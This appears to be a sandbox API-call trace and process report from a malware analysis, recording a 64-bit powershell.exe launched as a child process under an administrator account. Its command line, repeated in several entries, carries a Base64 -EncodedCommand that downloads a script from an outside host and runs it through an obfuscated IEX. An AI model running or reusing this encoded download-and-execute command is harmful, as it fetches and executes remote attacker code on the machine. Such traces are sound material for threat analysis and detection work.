	[0605.596] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0605.597] SetErrorMode (uMode=0x1) returned 0x1
	[0605.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0605.597] SetErrorMode (uMode=0x1) returned 0x1
	[0605.597] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0605.597] SetErrorMode (uMode=0x1) returned 0x1
	[0605.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0605.598] SetErrorMode (uMode=0x1) returned 0x1
	[0605.598] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0605.598] SetErrorMode (uMode=0x1) returned 0x1
	[0605.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0605.598] SetErrorMode (uMode=0x1) returned 0x1
	[0605.599] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0605.599] SetErrorMode (uMode=0x1) returned 0x1
	[0605.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0605.599] SetErrorMode (uMode=0x1) returned 0x1
	[0605.599] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0605.600] SetErrorMode (uMode=0x1) returned 0x1
	[0605.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0605.600] SetErrorMode (uMode=0x1) returned 0x1
	[0605.600] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0605.600] SetErrorMode (uMode=0x1) returned 0x1
	[0605.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0605.601] SetErrorMode (uMode=0x1) returned 0x1
	[0605.601] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7cdaa0 | out: lpFindFileData=0x1c7cdaa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x2463f0
	[0605.602] FindNextFileW (in: hFindFile=0x2463f0, lpFindFileData=0x1c7cdab0 | out: lpFindFileData=0x1c7cdab0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0605.602] FindClose (in: hFindFile=0x2463f0 | out: hFindFile=0x2463f0) returned 1
	[0605.602] SetErrorMode (uMode=0x1) returned 0x1
	[0605.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c7cdbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0605.603] SetErrorMode (uMode=0x1) returned 0x1
	[0605.603] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c7cddd0 | out: lpFileInformation=0x1c7cddd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0605.604] SetErrorMode (uMode=0x1) returned 0x1
	[0605.605] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0605.605] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0605.605] CoTaskMemFree (pv=0x19b4d0) 
	[0605.606] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0605.606] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0605.606] CoTaskMemFree (pv=0x19b4d0) 
	[0605.610] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0605.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0605.610] CoTaskMemFree (pv=0x19b4d0) 
	[0605.621] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0605.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0605.621] CoTaskMemFree (pv=0x19b4d0) 
	[0605.635] CoTaskMemAlloc (cb=0x3b) returned 0x1b916be0
	[0605.635] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7cdfb8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7cdfb8) returned 0x4550
	[0605.636] CoTaskMemFree (pv=0x1b916be0) 
	[0605.639] GetConsoleWindow () returned 0x1046e
	[0606.648] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0606.648] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.648] CoTaskMemFree (pv=0x19b4d0) 
	[0606.649] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0606.649] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0606.649] CoTaskMemFree (pv=0x19b4d0) 
	[0606.655] CoTaskMemAlloc (cb=0x104) returned 0x19b4d0
	[0606.655] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x19b4d0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0606.656] CoTaskMemFree (pv=0x19b4d0) 
	[0606.658] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c7ce000 | out: pNumArgs=0x1c7ce000) returned 0x199490*=""
	[0606.659] lstrlenW (lpString="-EncodedCommand") returned 15
	[0607.675] CoTaskMemAlloc (cb=0x22) returned 0x1b910490
	[0607.675] RtlMoveMemory (in: Destination=0x1b910490, Source=0x1994b2, Length=0x20 | out: Destination=0x1b910490) 
	[0607.675] CoTaskMemFree (pv=0x1b910490) 
	[0607.675] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0607.675] CoTaskMemAlloc (cb=0x2f4) returned 0x1b924cd0
	[0607.675] RtlMoveMemory (in: Destination=0x1b924cd0, Source=0x1994d2, Length=0x2f2 | out: Destination=0x1b924cd0) 
	[0607.675] CoTaskMemFree (pv=0x1b924cd0) 
	[0607.676] LocalFree (hMem=0x199490) returned 0x0
	[0607.677] CoTaskMemAlloc (cb=0x804) returned 0x1b91d460
	[0607.677] GetConsoleTitleW (in: lpConsoleTitle=0x1b91d460, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0607.677] CoTaskMemFree (pv=0x1b91d460) 
	[0607.687] CoTaskMemAlloc (cb=0x38e) returned 0x199490
	[0607.687] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c7cdf60*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2e8e2f8 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2e8e2f8*(hProcess=0x398, hThread=0x34c, dwProcessId=0x1a54, dwThreadId=0x19c8)) returned 1
	[0607.750] CoTaskMemFree (pv=0x199490) 
	[0607.751] CloseHandle (hObject=0x34c) returned 1
	[0607.752] CoTaskMemAlloc (cb=0x3b) returned 0x2436e0
	[0607.752] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7ce008, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7ce008) returned 0x4550
	[0607.753] CoTaskMemFree (pv=0x2436e0) 
	[0607.756] GetCurrentProcess () returned 0xffffffffffffffff
	[0607.756] GetCurrentProcess () returned 0xffffffffffffffff
	[0607.756] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x398, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7ce0e8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7ce0e8*=0x34c) returned 1

Process:
	id = "71"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x24604000"
	os_pid = "0x9c4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "15"
	os_parent_pid = "0xa3c"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 341
	os_tid = 0xbec


Thread:
	id = 415
	os_tid = 0x1068


Thread:
	id = 419
	os_tid = 0x1078


Process:
	id = "72"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1aec4000"
	os_pid = "0xcb0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "13"
	os_parent_pid = "0x9f4"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 343
	os_tid = 0xb78

	[0551.914] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0560.248] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0560.250] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0560.250] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0560.250] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0577.376] GetVersionExW (in: lpVersionInformation=0x26da80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26da80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0577.378] GetVersionExW (in: lpVersionInformation=0x26da80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26da80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0577.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0577.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0577.391] GetVersionExW (in: lpVersionInformation=0x26d7f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26d7f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0577.391] SetErrorMode (uMode=0x1) returned 0x1
	[0577.392] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26d950 | out: lpFileInformation=0x26d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0577.393] SetErrorMode (uMode=0x1) returned 0x1
	[0577.396] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26dbc0 | out: lpdwHandle=0x26dbc0) returned 0x94c
	[0577.398] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d072a0 | out: lpData=0x2d072a0) returned 1
	[0577.400] VerQueryValueW (in: pBlock=0x2d072a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26db38, puLen=0x26db30 | out: lplpBuffer=0x26db38*=0x2d0733c, puLen=0x26db30) returned 1
	[0577.403] lstrlenW (lpString="䅁") returned 1
	[0579.292] VerQueryValueW (in: pBlock=0x2d072a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26daa8, puLen=0x26daa0 | out: lplpBuffer=0x26daa8*=0x2d07418, puLen=0x26daa0) returned 1
	[0579.293] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0579.295] CoTaskMemAlloc (cb=0x2e) returned 0x11cd60
	[0579.295] lstrcpyW (in: lpString1=0x11cd60, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0579.297] CoTaskMemFree (pv=0x11cd60) 
	[0579.297] VerQueryValueW (in: pBlock=0x2d072a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26daa8, puLen=0x26daa0 | out: lplpBuffer=0x26daa8*=0x2d0746c, puLen=0x26daa0) returned 1
	[0579.297] lstrlenW (lpString="System.Management.Automation") returned 28
	[0579.297] CoTaskMemAlloc (cb=0x3c) returned 0x89e80
	[0579.297] lstrcpyW (in: lpString1=0x89e80, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0579.297] CoTaskMemFree (pv=0x89e80) 
	[0579.297] VerQueryValueW (in: pBlock=0x2d072a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26daa8, puLen=0x26daa0 | out: lplpBuffer=0x26daa8*=0x2d074c8, puLen=0x26daa0) returned 1
	[0579.297] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0579.297] CoTaskMemAlloc (cb=0x20) returned 0x14b520
	[0579.297] lstrcpyW (in: lpString1=0x14b520, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0579.297] CoTaskMemFree (pv=0x14b520) 
	[0579.297] VerQueryValueW (in: pBlock=0x2d072a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26daa8, puLen=0x26daa0 | out: lplpBuffer=0x26daa8*=0x2d07508, puLen=0x26daa0) returned 1
	[0579.297] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0579.297] CoTaskMemAlloc (cb=0x44) returned 0x89e80
	[0579.297] lstrcpyW (in: lpString1=0x89e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0579.297] CoTaskMemFree (pv=0x89e80) 
	[0579.297] VerQueryValueW (in: pBlock=0x2d072a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26daa8, puLen=0x26daa0 | out: lplpBuffer=0x26daa8*=0x2d07570, puLen=0x26daa0) returned 1
	[0579.297] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0579.297] CoTaskMemAlloc (cb=0x76) returned 0xeda30
	[0579.297] lstrcpyW (in: lpString1=0xeda30, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0579.297] CoTaskMemFree (pv=0xeda30) 
	[0579.297] VerQueryValueW (in: pBlock=0x2d072a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26daa8, puLen=0x26daa0 | out: lplpBuffer=0x26daa8*=0x2d0760c, puLen=0x26daa0) returned 1
	[0579.297] lstrlenW (lpString="System.Management.Automation.dll") returned 32
